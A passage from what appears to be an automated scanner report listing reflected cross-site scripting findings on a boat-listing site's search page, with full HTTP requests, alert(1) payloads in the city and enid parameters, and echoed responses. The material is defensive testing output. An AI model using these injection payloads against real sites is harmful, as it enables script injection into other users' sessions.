__utmb=20819632.9.10.1296155835; s_pers=%20s_nr%3D1296156327130%7C1298748327130%3B%20s_lv%3D1296156327132%7C1390764327132%3B%20s_lv_s%3DFirst%2520Visit%7C1296158127132%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253Fcint%2525253D100%25252526fromYear%2525253D2004%25252526Ntk%2525253DboatsEN%25252526se%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:34 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<script
...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "100169f3';alert(1)//f9a9fff124"<br>
...[SNIP]...

3.366. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49dab"%3balert(1)//2f4fe535b2f was submitted in the city parameter. This input was echoed as 49dab";alert(1)//2f4fe535b2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=49dab"%3balert(1)//2f4fe535b2f&rid=&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
ase entered"
s.prop8="24'-32'"
s.prop9=">2004"
s.prop10="no search phrase entered"
s.prop11="no search phrase entered"
s.prop12="no search phrase entered"
s.prop13="no search phrase entered"
s.prop14="49dab";alert(1)//2f4fe535b2f"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="United States"
s.prop18="no search phrase entered"
s.prop19="zero"
s.prop20="Homepage"
s.prop21="Default"
-->
...[SNIP]...

3.367. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96a74"><script>alert(1)</script>af46be172fc was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=96a74"><script>alert(1)</script>af46be172fc&rid=&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

3.368. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the city request parameter is copied into the HTML document as text between TITLE tags. The payload 11892</title><script>alert(1)</script>9de3548a2a1 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=11892</title><script>alert(1)</script>9de3548a2a1&rid=&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:37 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>2004 regulator Boats For Sale 11892</title><script>alert(1)</script>9de3548a2a1</title>
...[SNIP]...

3.369. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the enid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f380a"%3balert(1)//06fb479cf89 was submitted in the enid parameter. This input was echoed as f380a";alert(1)//06fb479cf89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cint=100&fromYear=2004&Ntk=boatsEN&searchtype=homepage&hmid=0&sm=3&enid=0f380a"%3balert(1)//06fb479cf89&currencyid=100&toLength=32&cit=true&luom=126&boatsAddedSelected=-1&fromLength=24&fromPrice=0&ftid=0&man=regulator&slim=quick&is=false&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.24.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.9.10.1296155835; s_pers=%20s_nr%3D1296156327130%7C1298748327130%3B%20s_lv%3D1296156327132%7C1390764327132%3B%20s_lv_s%3DFirst%2520Visit%7C1296158127132%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253Fcint%2525253D100%25252526fromYear%2525253D2004%25252526Ntk%2525253DboatsEN%25252526se%252526ot%25253DA%3B

Response

